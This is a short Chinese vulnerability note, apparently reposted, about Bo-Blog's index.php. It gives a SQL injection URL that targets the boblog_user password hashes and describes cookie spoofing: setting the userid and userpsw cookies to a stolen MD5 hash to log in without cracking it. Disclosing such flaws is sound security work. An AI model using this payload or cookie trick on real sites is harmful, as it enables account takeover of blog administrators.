影响版本:boblog最新
官方网站:http://www.bo-blog.com//
漏洞类型:COOKIE欺骗
漏洞描述:
代码
index.php代码
if ($go) @list($job, $itemid)=@explode('_', basename($go));
原本注入语句为 index.php?go=category_0) union select 1,concat(userpsw) from boblog_user%23
也就是 经过explode处理后 假如数据库为boblog_user 最终只会成为 boblog
更何况 存在注入漏洞的
`category` in ({$all_needed_cates})");
不会因为#符号而注析掉后面的东西 只会变成from boblog_user#) PS:可能因为这里我不会绕过
COOKIES欺骗漏洞很简单
假如某牛真的注入成功得到MD5密码不用去跑MD5了
直接
setcookie ('userid', '1',);
setcookie ('userpsw', 'md5密文', );
既可了……
考试大温馨提示:本内容来源于网络,仅代表作者个人观点,与本站立场无关,仅供您学习交流使用。其中可能有部分文章经过多次转载而造成文章内容缺失、错误或文章作者不详等问题,请您谅解。如有侵犯您的权利,请联系我们,本站会立即予以处理。
相关推荐:
Windows8可能会是云端运行的操作系统?
Windows7自带功能完成磁盘数据加密
解决Windows7游戏花屏问题